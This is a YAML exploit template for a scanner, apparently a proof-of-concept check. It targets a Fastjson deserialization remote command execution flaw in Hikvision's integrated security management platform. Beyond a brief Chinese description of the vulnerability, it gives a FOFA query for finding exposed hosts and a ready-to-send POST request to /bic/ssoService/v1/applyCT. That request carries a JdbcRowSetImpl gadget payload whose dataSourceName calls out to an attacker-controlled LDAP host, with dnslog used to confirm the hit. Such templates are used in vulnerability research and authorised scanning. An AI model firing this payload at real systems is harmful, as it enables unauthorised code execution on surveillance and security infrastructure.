product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 Fastjson远程命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: fastjson在解析json（反序列化）的过程中，支持使用@Type来实例化一个具体类，且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法，来远程加载恶意命令，即造成反序列化漏洞。服务器的fastjson在处理json数据的过程中，没有对@type进行校验，攻击者就可以传入危险类，并且调用危险的类远程连接ldap/rmi服务，通过ldap/rmi服务上的恶意代码执行远程命令
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: dnslog
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /bic/ssoService/v1/applyCT
      header:
        Content-Type: application/json
      data: '{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},"b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://{{m:rep}}", "autoCommit": True},"hfe4zyyzldp": "="}'
    verify:
      path: ''
      logic: and
      check:
        - model: dnslog